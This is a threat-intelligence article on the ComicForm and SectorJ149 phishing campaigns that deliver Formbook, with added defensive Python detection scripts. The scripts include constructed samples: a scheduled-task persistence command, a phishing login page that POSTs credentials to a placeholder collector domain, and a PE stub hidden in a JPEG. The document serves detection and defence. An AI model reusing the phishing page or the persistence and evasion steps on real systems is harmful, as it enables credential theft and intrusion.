Emerging Cyber Threats: ComicForm and SectorJ149 Deploy Formbook Malware in Eurasian and South Korean Attacks

In recent months, researchers have documented two separately tracked threat groups, ComicForm and SectorJ149, running phishing campaigns that deliver the Formbook information stealer: ComicForm against organizations in Russia, Belarus, and Kazakhstan, and SectorJ149 against companies in South Korea.

ComicForm’s Operations in Eurasia

Since at least April 2025, a previously undocumented hacking group named ComicForm has been targeting organizations in Belarus, Kazakhstan, and Russia. Their primary focus has been on sectors such as industrial, financial, tourism, biotechnology, research, and trade.

The attack methodology involves sending phishing emails with subject lines such as "Waiting for the signed document", "Invoice for Payment", or "Reconciliation Act for Signature". These emails urge recipients to open a RAR archive containing a Windows executable disguised as a PDF document (e.g., "Акт_сверки pdf 010.exe"). Note that "pdf" appears only as a word inside the filename; the real extension is .exe, and because Windows Explorer hides known extensions by default, a victim sees only "Акт_сверки pdf 010". The messages, written in Russian or English, originate from email addresses registered in the .ru, .by, and .kz top-level domains.

Upon execution, the obfuscated .NET loader launches a malicious DLL (MechMatrix Pro.dll), which in turn runs a second DLL named Montero.dll. This chain acts as a dropper for the Formbook malware. Along the way it establishes persistence by creating a scheduled task and evades detection by adding Microsoft Defender exclusions, both of which are observable host-level behaviours independent of the specific binaries.
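The execution chain in the two paragraphs above leaves three behaviours a defender can hunt for without knowing the file hashes: an .exe with a document-like name spawned by an archive tool, a scheduled task created by a process running from a user-writable path, and a registry write under the Defender Exclusions key (Sysmon records the latter as event ID 13; the Defender operational log also records configuration changes as event ID 5007). The following is an added example, not code from F6 or the original article; the event records are constructed to look like Sysmon-style telemetry, and the field names, the task name "Updater" and the paths are assumptions, not indicators from the report.

```python
"""Hunt for the ComicForm execution chain in constructed endpoint telemetry."""
import re

# Constructed sample events (Sysmon-like: eid 1 = process create, eid 13 = registry value set).
# None of these are real logs; the task name and paths are placeholders.
SAMPLE_EVENTS = [
    {"eid": 1, "image": r"C:\Users\u\Downloads\Акт_сверки pdf 010.exe",
     "parent": r"C:\Program Files\WinRAR\WinRAR.exe", "cmdline": ""},
    {"eid": 1, "image": r"C:\Windows\System32\schtasks.exe",
     "parent": r"C:\Users\u\Downloads\Акт_сверки pdf 010.exe",
     "cmdline": 'schtasks /create /sc minute /mo 5 /tn "Updater" /tr "C:\\Users\\u\\AppData\\Roaming\\svc.exe"'},
    {"eid": 13, "image": r"C:\Users\u\Downloads\Акт_сверки pdf 010.exe",
     "target": r"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\u\AppData\Roaming",
     "details": "DWORD (0x00000000)"},
    {"eid": 1, "image": r"C:\Windows\System32\notepad.exe",
     "parent": r"C:\Windows\explorer.exe", "cmdline": "notepad.exe report.txt"},
]

# Words that make an .exe look like a document to a user who cannot see extensions.
DOC_WORDS = frozenset({"pdf", "doc", "docx", "xls", "xlsx", "invoice", "акт", "счет"})
ARCHIVERS = ("winrar.exe", "7zfm.exe", "7z.exe")


def disguised_document_exe(path):
    """True if the filename ends in .exe but carries a document-like token in its stem."""
    name = path.replace("/", "\\").rsplit("\\", 1)[-1].lower()
    if not name.endswith(".exe"):
        return False
    # Token match rather than substring match so 'docker.exe' does not trip 'doc'.
    tokens = set(re.split(r"[\W_]+", name[:-4]))
    return bool(tokens & DOC_WORDS)


def hunt(events):
    """Return [(rule, event_index)] for events matching the chain's observable behaviours."""
    hits = []
    for i, ev in enumerate(events):
        image = ev.get("image", "")
        parent = ev.get("parent", "").lower()
        cmdline = ev.get("cmdline", "").lower()
        # Rule 1: document-named executable launched by an archive tool (the RAR lure).
        if ev["eid"] == 1 and disguised_document_exe(image) and parent.endswith(ARCHIVERS):
            hits.append(("doc_named_exe_from_archiver", i))
        # Rule 2: persistence via schtasks /create from a parent outside C:\Windows.
        if (ev["eid"] == 1 and image.lower().endswith("schtasks.exe")
                and "/create" in cmdline and not parent.startswith("c:\\windows")):
            hits.append(("schtasks_create_from_user_process", i))
        # Rule 3: defence evasion via a new Defender exclusion (registry value set).
        if ev["eid"] == 13 and "\\windows defender\\exclusions\\" in ev.get("target", "").lower():
            hits.append(("defender_exclusion_added", i))
    return hits


if __name__ == "__main__":
    for rule, idx in hunt(SAMPLE_EVENTS):
        print(f"{rule}: {SAMPLE_EVENTS[idx]['image']}")
```

Each rule fires on its own, but the combination within one process tree (rules 1 to 3 sharing the same image or parent path) is what distinguishes this chain from a legitimate installer, so in a real SIEM the three hits should be correlated on the process GUID rather than alerted separately.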

Notably, the binary contains Tumblr links pointing to harmless GIFs of comic superheroes like Batman, which inspired the group’s name. These images are not used in the attack but are embedded within the malware code.

Further analysis of ComicForm’s infrastructure indicates phishing emails were directed at an unspecified company in Kazakhstan in June 2025 and a Belarusian bank in April 2025. Additionally, phishing emails sent to Russian manufacturing companies from a Kazakhstan-based industrial company’s email address were detected and blocked as recently as July 25, 2025.

The emails in this July campaign prompt recipients to click an embedded link to confirm their account and avoid a supposed block. The link leads to a counterfeit landing page mimicking the login page of a domestic document management service; credentials entered there are sent to an attacker-controlled domain via an HTTP POST request.

The phishing page's JavaScript extracts the victim's email address from the URL parameters, pre-populates the input field with id=email, takes the domain part of the address, and sets a screenshot of that domain's website (fetched through the screenshotapi[.]net API) as the page background. The effect is that a single generic page appears tailored to the victim's own organization, with the target's address already filled in, without the attacker having to host anything organization-specific.
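When such a page is captured, the traits just described (a POST to a domain other than the one serving the page, email pre-fill driven by URL parameters, and a background built from a screenshot of the victim's domain) can be checked statically. The script below is an added example, not code from F6 or the article; SAMPLE_HTML is a constructed page that imitates the described behaviour, the domains in it are placeholders, and the screenshotapi endpoint shape is an assumption rather than the service's documented URL format.

```python
"""Static triage of a saved credential-phishing page for the traits described above."""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample page (not a real capture); domains are placeholders.
SAMPLE_HTML = """<html><body>
<form id="login" method="POST" action="https://collector.example.invalid/post.php">
  <input id="email" name="email"><input id="pass" name="password" type="password">
</form>
<script>
  const p = new URLSearchParams(location.search);
  const email = p.get("email") || "";
  document.getElementById("email").value = email;
  const domain = email.split("@")[1];
  document.body.style.backgroundImage =
    "url(https://shot.screenshotapi.net/screenshot?url=https://" + domain + ")";
</script></body></html>"""


class FormScriptCollector(HTMLParser):
    """Collect (method, action) of every form and the text of every inline script."""

    def __init__(self):
        super().__init__()
        self.forms = []
        self.scripts = []
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self.forms.append(((a.get("method") or "GET").upper(), a.get("action") or ""))
        elif tag == "script":
            self._in_script = True

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script:
            self.scripts.append(data)


def triage(html, page_host):
    """Return a dict of indicator flags plus a simple count; page_host is the host serving the page."""
    p = FormScriptCollector()
    p.feed(html)
    js = "\n".join(p.scripts)
    ind = {
        # Form submits by POST to a host other than the one serving the page.
        "posts_offsite": any(m == "POST" and urlparse(act).hostname not in (None, page_host)
                             for m, act in p.forms),
        # Email field is filled from the query string or fragment, i.e. per-victim links.
        "prefills_email_from_url": bool(re.search(r"URLSearchParams|location\.(search|hash)", js))
                                   and "email" in js,
        # Background is a live screenshot of the domain taken from the victim's address.
        "brands_with_victim_domain_screenshot": "screenshotapi.net" in js and 'split("@")' in js,
    }
    ind["score"] = sum(1 for v in ind.values() if v)
    return ind


if __name__ == "__main__":
    print(triage(SAMPLE_HTML, "login.example.invalid"))
```

A score of 3 on a page that claims to be a document-management login is a strong signal; the off-site POST alone is the indicator worth blocking on at the proxy, since it names the collection domain directly.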

In the case of the Belarusian bank, a phishing email with an invoice-themed lure tricked users into entering their email addresses and phone numbers into a form, which were then captured and sent to an external domain.

F6, the cybersecurity company analyzing these attacks, stated: "The group attacks Russian, Belarusian, and Kazakh companies from various sectors, and the use of English-language emails suggests that the attackers are also targeting organizations in other countries. The attackers employ both phishing emails distributing Formbook malware and phishing resources disguised as web services to harvest access credentials."

SectorJ149’s Activities in South Korea

Concurrently, the NSHC ThreatRecon Team disclosed details of a pro-Russian cybercrime group, SectorJ149 (also known as UAC-0050), targeting manufacturing, energy, and semiconductor sectors in South Korea.

In November 2024, SectorJ149 began sending spear-phishing emails to executives and employees with lures about production facility purchases or quotation requests. The emails led to the execution of commodity malware families such as Lumma Stealer, Formbook, and Remcos RAT via a Visual Basic Script delivered inside a Microsoft cabinet (CAB) archive.

The Visual Basic Script executes a PowerShell command that contacts a Bitbucket or GitHub repository to fetch a JPG image file, which conceals a loader executable responsible for launching the final stealer and RAT payloads.

The loader, which runs directly in memory, downloads further malicious data disguised as a text file (.txt) from a URL passed in its parameters, decrypts it, reconstructs a PE image from the result, and executes it. Neither the JPG nor the .txt is what its extension claims; both are containers for code.
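The two stages above both hide executables behind innocuous file types: a loader inside a JPG fetched from a code-hosting site, then an encrypted PE disguised as a .txt. The decryption step cannot be reproduced from the report, but the container tricks can be checked. The following is an added example, not NSHC's code; it assumes the loader is stored as a raw MZ/PE blob appended after the JPEG end-of-image marker (a common way to hide a payload in an image), and a payload that is base64-encoded or encrypted inside the image would need its own decoder. The sample image and PE stub are constructed in the code and are not real artefacts.

```python
"""Find a PE hidden in an image and check whether a '.txt' download is really text."""
import struct

JPEG_SOI = b"\xff\xd8"
JPEG_EOI = b"\xff\xd9"


def minimal_pe_stub():
    """Build a constructed MZ/PE header skeleton (a header only, not a runnable program)."""
    hdr = bytearray(b"MZ" + b"\x00" * 0x3a)          # DOS header up to e_lfanew at 0x3c
    hdr += struct.pack("<I", 0x40)                    # e_lfanew: PE signature lives at 0x40
    hdr += b"\x00" * (0x40 - len(hdr))
    hdr += b"PE\x00\x00" + struct.pack("<HH", 0x14C, 1)  # IMAGE_FILE_HEADER: i386, 1 section
    return bytes(hdr)


# Constructed sample: a tiny JPEG skeleton, and the same image with a PE stub appended.
SAMPLE_JPG = JPEG_SOI + b"\xff\xe0\x00\x10JFIF\x00" + b"\x00" * 9 + b"\x11" * 64 + JPEG_EOI
SAMPLE_TROJAN_JPG = SAMPLE_JPG + minimal_pe_stub() + b"\x90" * 32


def find_pe_in_image(data):
    """Return [(offset, location)] for every 'MZ' whose e_lfanew points at 'PE\\0\\0'.

    location is 'after_eoi' when the header sits in the trailer after the last
    JPEG end-of-image marker, else 'inside_image'.
    """
    eoi = data.rfind(JPEG_EOI)
    trailer_start = eoi + 2 if eoi != -1 else None
    hits = []
    off = data.find(b"MZ")
    while off != -1:
        if off + 0x40 <= len(data):
            e_lfanew = struct.unpack_from("<I", data, off + 0x3c)[0]
            pe = off + e_lfanew
            # Real PE files keep e_lfanew small; bound it to avoid chasing random bytes.
            if 0x40 <= e_lfanew < 0x1000 and data[pe:pe + 4] == b"PE\x00\x00":
                where = "after_eoi" if trailer_start is not None and off >= trailer_start else "inside_image"
                hits.append((off, where))
        off = data.find(b"MZ", off + 1)
    return hits


def is_plausible_text(blob, threshold=0.9):
    """True if at least `threshold` of the bytes are printable ASCII or whitespace.

    A '.txt' that fails this check is a binary (encrypted or packed) payload wearing a text extension.
    """
    if not blob:
        return True
    printable = sum(1 for b in blob if 0x20 <= b <= 0x7E or b in (0x09, 0x0A, 0x0D))
    return printable / len(blob) >= threshold


if __name__ == "__main__":
    print("clean image:", find_pe_in_image(SAMPLE_JPG))
    print("trojanised image:", find_pe_in_image(SAMPLE_TROJAN_JPG))
    print("stage-two 'text' is really text:", is_plausible_text(SAMPLE_TROJAN_JPG))
```

In practice run the image check on anything a script host (wscript.exe, powershell.exe) downloads from Bitbucket, GitHub or similar raw-content URLs, since a legitimate JPG has no business carrying a trailer with a valid PE header.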

Historically, SectorJ149 primarily operated for financial gain. However, recent hacking activities targeting South Korean companies are believed to have a strong hacktivist nature, using hacking techniques to convey political, social, or ideological messages.

Implications and Recommendations

Neither campaign relies on a software vulnerability. Both depend on a user opening an attachment or following a link, then on living-off-the-land tooling (scheduled tasks, Defender exclusions, PowerShell, script hosts) and on commodity payloads, which is why the behaviours are more durable detection points than the specific binaries.

Organizations are advised to implement robust cybersecurity measures, including:

– Employee Training: Educate staff on the lures seen here (unsolicited invoices, reconciliation acts, quotation requests, account-confirmation links) and on the fact that a "document" inside an archive that shows no extension may be an executable.

– Email Filtering: Block or detonate archives (RAR, CAB) that contain executables or scripts, and flag messages whose embedded links lead to login pages on domains that do not belong to the service they imitate.

– Endpoint Protection: Beyond signature detection, alert on Microsoft Defender exclusion changes, on scheduled tasks created by processes running from user-writable paths, and on script hosts or PowerShell fetching content from code-hosting sites.

– Regular Updates: Keep systems and software patched; this reduces exposure generally, though the chains described here do not depend on an unpatched vulnerability, so patching alone does not stop them.

– Incident Response Plan: Develop and regularly update an incident response plan, and since Formbook and Lumma Stealer are credential stealers, treat any confirmed infection or phishing-page submission as a credential compromise requiring password and session resets.

By adopting these measures, organizations can enhance their resilience against such targeted cyber threats.